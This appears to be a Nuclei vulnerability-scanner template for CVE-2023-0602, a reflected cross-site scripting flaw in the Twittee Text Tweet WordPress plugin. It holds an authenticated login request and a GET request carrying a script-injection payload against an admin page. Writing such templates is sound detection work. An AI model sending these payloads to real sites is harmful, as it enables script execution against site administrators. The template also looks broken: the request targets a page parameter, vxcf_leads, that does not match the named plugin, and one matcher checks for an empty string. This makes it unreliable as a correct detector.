id: CVE-2023-0602 info: name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen. reference: - https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255 - https://nvd.nist.gov/vuln/detail/CVE-2023-0602 - https://wordpress.org/plugins/twittee-text-tweet/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0602 cwe-id: CWE-79 epss-score: 0.00064 epss-percentile: 0.26204 cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: johnniejodelljr product: twittee_text_tweet framework: wordpress tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - 'contains_all(body_2, "", "twittee")' condition: and # digest: 4b0a00483046022100e5fce08d81164199e113a5e8a44e47e3a80de938ed5284232742f6ec12745cff022100af62d819e8c9fe644c67d22c4e6cb543bfce8719a6d6046b423facdeed2ee8e7:922c64590222798bb761d5b6d8e72950